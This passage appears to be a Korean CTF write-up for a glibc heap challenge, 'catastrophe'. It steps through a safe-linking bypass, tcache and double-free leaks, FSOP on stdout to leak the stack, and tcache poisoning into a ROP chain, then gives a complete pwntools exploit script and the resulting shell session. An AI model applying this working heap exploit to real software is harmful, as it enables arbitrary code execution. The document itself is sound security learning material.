\ud2b9\uc774\uc0ac\ud56d\uc73c\ub85c idx9\uc5d0\uc11c 0x10 \ud06c\uae30\ub85c malloc\ud558\uc5ec \/bin\/sh \ubb38\uc790\uc5f4\uc744 \ub193\ub294\ub2e4.<\/strong><\/p>\n\n\n\n...\nmalloc(0, 0x100, b\"YY\")\n\nmalloc(7, 0x100, b\"YY\")\nmalloc(8, 0x100, b\"YY\")\n\nmalloc(9, 0x10, b\"\/bin\/sh\\0\")<\/pre>\n\n\n\n
gdb-peda$ x\/16gx &chonks\n0x55a59a8a2060 <chonks>:\t0x000055a5d54732a0\t0x000055a5d54733b0\n0x55a59a8a2070 <chonks+16>:\t0x000055a5d54734c0\t0x000055a5d54735d0\n0x55a59a8a2080 <chonks+32>:\t0x000055a5d54736e0\t0x000055a5d54737f0\n0x55a59a8a2090 <chonks+48>:\t0x000055a5d5473900\t0x000055a5d5473a10\n0x55a59a8a20a0 <chonks+64>:\t0x000055a5d5473b20\t0x000055a5d5473c30\n0x55a59a8a20b0:\t0x0000000000000000\t0x0000000000000000\n0x55a59a8a20c0:\t0x0000000000000000\t0x0000000000000000\n0x55a59a8a20d0:\t0x0000000000000000\t0x0000000000000000\n\ngdb-peda$ x\/s 0x000055a5d5473c30\n0x55a5d5473c30:\t\"\/bin\/sh\"<\/pre>\n\n\n\n
tcache\ub97c \uac00\ub4dd \ucc44\uc6b0\uae30 \uc704\ud574 \ucc98\uc74c\uae30\uc900 idx0\ubd80\ud130 7\ubc88 free \uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\nfor i in range(7):\n free(i)<\/pre>\n\n\n\n
\n
gdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x5c73fe7eac40 (size : 0x203c0) \n last_remainder: 0x0 (size : 0x0) \n unsortbin: 0x0\n(0x110) tcache_entry[15](7): 0x5c73fe7ea900 --> 0x5c73fe7ea7f0 --> 0x5c73fe7ea6e0 --> 0x5c73fe7ea5d0 --> 0x5c73fe7ea4c0 --> 0x5c73fe7ea3b0 --> 0x5c73fe7ea2a0<\/pre>\n\n\n\n
\uc774\uc81c idx9\uc5d0 100\ud06c\uae30\ub9cc\ud07c (0x100\uacfc \ub2e4\ub984) \ud560\ub2f9\uc2dc\ucf30\ub2e4 \ub2e4\uc2dc free \ud574\uc900\ub2e4.<\/s><\/p>\n\n\n\n\uc758\ub3c4\ub294 \uc544\uc9c1\uae4c\uc9c4 \uc798 \ubaa8\ub974\uaca0\ub2e4\u2026? \uc544\ubb34\ud2bc free\ub97c \ud588\uc73c\ub2c8 0x70 tcache\ub85c \ub4e4\uc5b4\uac04\ub2e4.<\/s><\/p>\n\n\n\nmalloc(9, 100, b\"YY\")\nfree(9)<\/pre>\n\n\n\n
\n
gdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x560b807d5cb0 (size : 0x20350) \n last_remainder: 0x0 (size : 0x0) \n unsortbin: 0x0\n(0x70) tcache_entry[5](1): 0x560b807d5c50\n(0x110) tcache_entry[15](7): 0x560b807d5900 --> 0x560b807d57f0 --> 0x560b807d56e0 --> 0x560b807d55d0 --> 0x560b807d54c0 --> 0x560b807d53b0 --> 0x560b807d52a0<\/pre>\n\n\n\n
\uc774\uc804 3\ubc88 \uacfc\uc815\uc5d0\uc11c tcache\ub97c \ucc44\uc6e0\ub2e4\uba74, \uc774\uc81c\ub294 unsorted bin\uc73c\ub85c \ub4e4\uc5b4\uac08 \ucc28\ub840\ub2e4.<\/p>\n\n\n\nfree(8)\nfree(7)\nview(8)\n\nl.address = u64(p.recvline()[:-1].ljust(8, b\"\\x00\")) - 0x21ace0 # - 0x1bebe0 # offset of the unsorted bin\n\nrop = ROP(l)\nbinsh = next(l.search(b\"\/bin\/sh\\x00\"))\nrop.execve(binsh, 0, 0)\n\nenviron = l.sym.environ\nstdout = l.sym._IO_2_1_stdout_\n\ninfo(f\"libc: {hex(l.address)}\")\ninfo(f\"environ: {hex(environ)}\")\ninfo(f\"stdout: {hex(stdout)}\")<\/pre>\n\n\n\n\n
gdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x5bc4cfc0ac40 (size : 0x203c0) \n last_remainder: 0x0 (size : 0x0) \n unsortbin: 0x5bc4cfc0aa00 (size : 0x220)\n(0x110) tcache_entry[15](7): 0x5bc4cfc0a900 --> 0x5bc4cfc0a7f0 --> 0x5bc4cfc0a6e0 --> 0x5bc4cfc0a5d0 --> 0x5bc4cfc0a4c0 --> 0x5bc4cfc0a3b0 --> 0x5bc4cfc0a2a0<\/pre>\n\n\n\n
idx0\uc5d0 0x100\ub9cc\ud07c malloc\ud558\uace0, idx8\uc744 double-free\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\nmalloc(0, 0x100, b\"YY\")\nfree(8)<\/pre>\n\n\n\n
gdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x5ace26a32c40 (size : 0x203c0) \n last_remainder: 0x0 (size : 0x0) \n unsortbin: 0x5ace26a32a00 (overlap chunk with 0x5ace26a32b10(freed) )\n(0x110) tcache_entry[15](7): 0x5ace26a32b20 --> 0x5ace26a327f0 --> 0x5ace26a326e0 --> 0x5ace26a325d0 --> 0x5ace26a324c0 --> 0x5ace26a323b0 --> 0x5ace26a322a0\ngdb-peda$ \n<\/pre>\n\n\n\n
idx1\uc5d0 0x130\ud06c\uae30\ub9cc\ud07c \uba54\ubaa8\ub9ac\ub97c \ud560\ub2f9\ud558\ub294\ub370, fake chunk\ub97c \uad6c\uc131\ud558\ub294\uac83\ucc98\ub7fc \ubcf4\uc778\ub2e4.<\/p>\n\n\n\n\n
malloc(1, 0x130, b\"T\"*0x108 + p64(0x111) + p64((stdout ^ ((heap + 0xb20) >> 12))))\nmalloc(2, 0x100, b\"TT\")\nmalloc(3, 0x100, p32(0xfbad1800) + p32(0) + p64(environ)*3 + p64(environ) + p64(environ + 0x8)*2 + p64(environ + 8) + p64(environ + 8))\n\nstack = u64(p.recv(8)[:-1].ljust(8, b\"\\x00\")) - 0x130 - 8# - 0x1bebe0 # offset of the unsorted bin\ninfo(f\"stack: {hex(stack)}\")<\/pre>\n\n\n\n
idx1, 2\ub97c free\uc2dc\ud0a4\uace0, \ub2e4\uc2dc\ud55c\ubc88 AAW \uad6c\uc131\uc744 \ud558\ub824\ub294\uac83\ucc98\ub7fc \ubcf4\uc778\ub2e4.<\/p>\n\n\n\n
\uc5ec\uae30\uc11c mchunk_size\ub294 0x111, \uc2a4\ud0dd \uc8fc\uc18c\uac00 safe-linking \uc801\uc6a9\ub418\uc5b4 \ud568\uaed8 \ub4e4\uc5b4\uac04\ub2e4.<\/p>\n\n\n\n
execve(\u201dsh\u201d, 0, 0)\uc744 \uc218\ud589\ud558\uac8c \ub9cc\ub4e0\ub2e4.<\/p>\n\n\n\nfree(1) # large\nfree(2)\n\nmalloc(5, 0x130, b\"T\"*0x108 + p64(0x111) + p64((stack ^ ((heap + 0xb20) >> 12))))\nmalloc(2, 0x100, b\"TT\")\n\nmalloc(3, 0x100, p64(stack) + rop.chain()) # overwrite sRBP for nothing lmao<\/pre>\n\n\n\n
\n
from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\nimport sys\n\np = process(\".\/catastrophe.bak\")\ne = ELF('.\/catastrophe.bak',checksec=False)\nl = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\n# l = ELF('.\/libc.so.6', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = lambda: p.interactive()\n\ndef malloc(idx, size, content):\n if(idx > 10):\n info(\"idx is too big\")\n sys.exit(1)\n sla(\"> \", \"1\")\n sla(\"> \", str(idx))\n sla(\"> \", str(size))\n sla(b\"Enter content: \", content)\n\ndef free(idx):\n if(idx > 10):\n info(\"idx is too big\")\n sys.exit(1)\n sla(\"> \", \"2\")\n sla(\"> \", str(idx))\n\ndef view(idx):\n if(idx > 10):\n info(\"idx is too big\")\n sys.exit(1)\n sla(\"> \", \"3\")\n sla(\"> \", str(idx))\n\ndef decrypt(cipher):\n key = 0\n plain = 0\n\n for i in range(1, 6):\n bits = 64-12*i\n if bits < 0:\n bits = 0\n plain = ((cipher ^ key) >> bits) << bits\n key = plain >> 12\n\n return plain\n\n# 1. Defeat safe-linking\n# malloc(0x100) 7\ubc88 \ud560\ub2f9\uc2dc\ud0a4\uace0 0\ubc88 \uc778\ub371\uc2a4\ub97c free\uc2dc\ucf1c fd\uac12\uc744 \uc54c\uc544\ub0b8\ub2e4\uc74c, \ub2e4\uc2dc 0\ubc88\uca30 \uc778\ub371\uc2a4 \ud560\ub2f9.\nfor i in range(7):\n malloc(i, 0x100, b\"\")\nfree(0)\n\nview(0)\n\nheap = ((u64(p.recvline()[:-1].ljust(8, b\"\\x00\")) << 12))\ninfo(f\"heap @ {hex(heap)}\")\n# then we defeated safe linking lol\nmalloc(0, 0x100, b\"YY\")\n\n# 2. 7,8 \uc778\ub371\uc2a4\uc5d0 malloc(0x100)\uc744 \ub354 \ud558\uc9c0\ub9cc, 9\ubc88 \uc778\ub371\uc2a4\ubd80\ud130\ub294 malloc(0x10)\uc73c\ub85c \"\/bin\/sh\" \uc800\uc7a5.\nmalloc(7, 0x100, b\"YY\")\nmalloc(8, 0x100, b\"YY\")\n\nmalloc(9, 0x10, b\"\/bin\/sh\\0\")\n\n\n# 3. 0~6\ubc88\uc9f8 \uc778\ub371\uc2a4\ub97c free \uc2dc\ud0a4\uace0\nfor i in range(7):\n free(i)\n\n# 4.\n# fastbin_dup \ud2b8\ub9ac\uac70. free(8)-free(7)-malloc(0x100, dummy)-free(8)\n# free(7) \uc774\ud6c4, view(8)\uc73c\ub85c fd\uac12\uc744 \ud1b5\ud574 libc base \uc8fc\uc18c \ud68d\ub4dd\nfree(8)\nfree(7)\nview(8)\n\nl.address = u64(p.recvline()[:-1].ljust(8, b\"\\x00\")) - 0x21ace0 # - 0x1bebe0 # offset of the unsorted bin\n\nrop = ROP(l)\nbinsh = next(l.search(b\"\/bin\/sh\\x00\"))\nrop.execve(binsh, 0, 0)\n\nenviron = l.sym.environ\nstdout = l.sym._IO_2_1_stdout_\n\ninfo(f\"libc: {hex(l.address)}\")\ninfo(f\"environ: {hex(environ)}\")\ninfo(f\"stdout: {hex(stdout)}\")\n\n# ip()\n\n#0x556190f0d900\nmalloc(0, 0x100, b\"YY\")\nfree(8)\n\n# 5.\n# \uc774\ud6c4 malloc(1, 0x130)\uc5d0 fake chunk \uad6c\uc131.\n# malloc(2, 0x100, dummy) \uad6c\uc131.\n# malloc(3, 0x100, fsop chain) \uad6c\uc131\uc2dc\ucf1c \uc2a4\ud0dd\uc8fc\uc18c \ub204\ucd9c.\n#0x556190f0da10\nmalloc(1, 0x130, b\"T\"*0x108 + p64(0x111) + p64((stdout ^ ((heap + 0xb20) >> 12))))\n#0x556190f0db20\nmalloc(2, 0x100, b\"TT\")\n#0x7d3a1821b780 (libc: 0x7d3a18000000)\nmalloc(3, 0x100, p32(0xfbad1800) + p32(0) + p64(environ)*3 + p64(environ) + p64(environ + 0x8)*2 + p64(environ + 8) + p64(environ + 8))\n\nstack = u64(p.recv(8)[:-1].ljust(8, b\"\\x00\")) - 0x130 - 8# - 0x1bebe0 # offset of the unsorted bin\ninfo(f\"stack: {hex(stack)}\")\n\n# 6.\n# free(1) - free(2)\uc774\ud6c4, malloc(5, 0x130, fake chunk) \uad6c\uc131.\n# malloc(2, 0x100, dummy) - malloc(3, 0x100, stack + rop chain) \uad6c\uc131.\nfree(1) # large\nfree(2)\n\nmalloc(5, 0x130, b\"T\"*0x108 + p64(0x111) + p64((stack ^ ((heap + 0xb20) >> 12))))\nmalloc(2, 0x100, b\"TT\")\n\n# ip()\nmalloc(3, 0x100, p64(stack) + rop.chain()) # overwrite sRBP for nothing lmao\n\np.interactive()<\/pre>\n\n\n\n\n
python3 solve_rop.py\n[+] Starting local process '.\/catastrophe.bak': pid 21248\n[*] heap @ 0x562d51e2e000\n[*] Loaded 219 cached gadgets for '\/lib\/x86_64-linux-gnu\/libc.so.6'\n[*] libc: 0x7f477fff1000\n[*] environ: 0x7f4780213200\n[*] stdout: 0x7f478020c780\n[*] stack: 0x7ffcdeec4a50\n[*] Switching to interactive mode\n$ id\nuid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)\n$ whoami\nubuntu\n$ \n[*] Interrupted\n[*] Stopped process '.\/catastrophe.bak' (pid 21248)<\/pre>\n","protected":false},"excerpt":{"rendered":"